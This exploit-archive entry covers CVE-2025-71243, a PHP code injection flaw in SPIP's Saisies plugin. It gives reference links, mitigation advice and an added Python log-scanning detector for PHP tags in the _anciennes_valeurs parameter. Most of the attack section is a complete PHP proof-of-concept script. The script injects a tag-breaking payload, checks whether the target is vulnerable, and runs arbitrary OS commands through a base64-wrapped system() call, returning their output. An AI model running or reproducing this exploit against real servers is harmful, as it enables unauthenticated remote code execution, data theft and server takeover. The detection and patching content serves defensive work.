| Title | Published | Reporter |
|---|---|---|
| CVE-2025-71243 | 19 Feb 2026 14:58 | attackerkb |
| Exploit for CVE-2025-71243 | 19 Feb 2026 16:13 | githubexploit |
| CVE-2025-71243 | 19 Feb 2026 16:31 | circl |
| SPIP code injection vulnerability | 19 Feb 2026 00:00 | cnnvd |
| CVE-2025-71243 | 19 Feb 2026 14:58 | cve |
| CVE-2025-71243 SPIP Saisies Plugin < 5.11.1 Remote Code Execution | 19 Feb 2026 14:58 | cvelist |
| SPIP Saisies Plugin Unauthenticated RCE | 9 Mar 2026 18:57 | metasploit |
| SPIP Saisies - Remote Code Execution | 1 Jun 2026 05:38 | nuclei |
| CVE-2025-71243 | 19 Feb 2026 16:27 | nvd |
| SPIP Saisies 5.11.0 Remote Code Execution | 24 Feb 2026 00:00 | packetstorm |
=============================================================================================================================================
| # Title : SPIP Saisies Plugin 5.4.0-5.11..PHP Code Injection Security Analysis and Risk Overview |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================
[+] Summary : A critical PHP code injection vulnerability has been identified in the Saisies plugin for SPIP.
The issue affects versions 5.4.0 through 5.11.0 and stems from improper sanitization of user-controlled input in the _anciennes_valeurs parameter.
When improperly handled inside template rendering logic, attacker-supplied input may be interpreted as executable PHP code.
If successfully exploited, this vulnerability could lead to:
 - Remote Code Execution (RCE)
 - Arbitrary command execution
 - Data disclosure
 - Server compromise (depending on privileges)
Security teams should:
 - Upgrade to the latest patched version immediately
 - Review template rendering logic for unsafe input handling
 - Enforce strict input validation and output encoding
 - Monitor logs for anomalous POST requests targeting the affected parameter
 - Consider deploying a Web Application Firewall (WAF)
The vulnerability highlights the importance of secure template rendering and strict separation between user input and executable code.
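The log monitoring recommended above, sketched as an added detection example (not part of the original advisory and not SPIP or plugin code). It flags POST bodies in which _anciennes_valeurs carries a PHP open or close tag, including double URL-encoded values. Assumptions: a WAF or audit log that records request bodies in the tab-separated layout shown, array-style parameter names, and constructed sample lines.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

PARAM = "_anciennes_valeurs"  # parameter named in the advisory
# PHP open/close tags have no business in a submitted form value.
PHP_TAG = re.compile(r"<\?(?:php|=)?|\?>", re.IGNORECASE)

# Constructed sample: tab-separated time, client, method, path, POST body.
# Assumption: the WAF or audit log in use records request bodies.
SAMPLE_LOG = [
    "2026-02-20T10:01:02Z\t192.0.2.10\tPOST\t/spip.php?page=contact\tnom=Alice&_anciennes_valeurs=abc123",
    "2026-02-20T10:03:40Z\t198.51.100.7\tPOST\t/spip.php?page=contact\t_anciennes_valeurs=x%27+%3F%3E%3C%3Fphp+echo+%27probe%27%3B+%3F%3E",
    "2026-02-20T10:04:11Z\t198.51.100.7\tPOST\t/spip.php?page=contact\t_anciennes_valeurs%5Bmessage%5D=%253C%253Fphp%2520echo%25201%253B",
    "2026-02-20T10:05:00Z\t192.0.2.10\tGET\t/spip.php?page=contact\t-",
    "2026-02-20T10:06:30Z\t192.0.2.44\tPOST\t/spip.php?page=contact\tmessage=question+about+%3C%3Fphp+tags",
]

def fully_decode(value, max_rounds=3):
    """Undo repeated URL-encoding so %253C%253F is still seen as '<?'."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_fields(body):
    """Return (name, value) pairs where the parameter carries a PHP tag."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        # Assumption: array-style names (_anciennes_valeurs[champ]) also count.
        if name != PARAM and not name.startswith(PARAM + "["):
            continue
        value = fully_decode(value)
        if PHP_TAG.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return one alert dict per suspicious field found in POST log lines."""
    alerts = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 5 or parts[2] != "POST":
            continue
        ts, client, _, path, body = parts
        for name, value in suspicious_fields(body):
            alerts.append({"time": ts, "client": client, "path": path,
                           "param": name, "value": value[:80]})
    return alerts
```

The match is scoped to the one parameter so that legitimate form text mentioning PHP tags in other fields (the last sample line) does not raise an alert.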
[+] POC :
<?php
$options = getopt("u:c:p:", ["url:", "cmd:", "param:"]);
$target_url = $options['u'] ?? ($options['url'] ?? null);
$command = $options['c'] ?? ($options['cmd'] ?? null);
$param_name = $options['p'] ?? ($options['param'] ?? '_anciennes_valeurs');
if (!$target_url) {
die("Usage: php exploit.php -u <url> [-c <command>] [-p <parameter>]\nExample: php exploit.php -u http://site.com/spip.php?page=contact -c 'id'\n");
}
function send_request($url, $post_data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)");
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ['body' => $response, 'code' => $http_code];
}
function execute_php($url, $param, $php_code) {
$start_marker = substr(md5(rand()), 0, 8);
$end_marker = substr(md5(rand()), 0, 8);
$wrapped = "echo '{$start_marker}'; {$php_code}; echo '{$end_marker}';";
$injection = "x' ?><?php {$wrapped} ?><input value='x";
$response = send_request($url, [$param => $injection]);
if (!$response['body']) return null;
$pattern = "/" . preg_quote($start_marker) . "(.*?)" . preg_quote($end_marker) . "/s";
if (preg_match($pattern, $response['body'], $matches)) {
return trim($matches[1]);
}
return null;
}
echo "[*] Targeting: $target_url\n";
echo "[*] Parameter: $param_name\n";
$test_marker = "VULN_CHECK_" . rand(100, 999);
$check_result = execute_php($target_url, $param_name, "echo '{$test_marker}';");
if ($check_result && strpos($check_result, $test_marker) !== false) {
echo "[+] Target is Vulnerable!\n";
} else {
echo "[-] Target does not seem vulnerable or parameter is incorrect.\n";
exit(1);
}
if ($command) {
echo "[*] Executing command: $command\n";
// Use base64 to avoid special character issues in commands
$cmd_payload = "system(base64_decode('" . base64_encode($command) . "'));";
$output = execute_php($target_url, $param_name, $cmd_payload);
if ($output) {
echo "[+] Result:\n$output\n";
} else {
echo "[-] Command executed but returned no output.\n";
}
} else {
echo "[!] No command specified. Use -c to execute an OS command.\n";
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================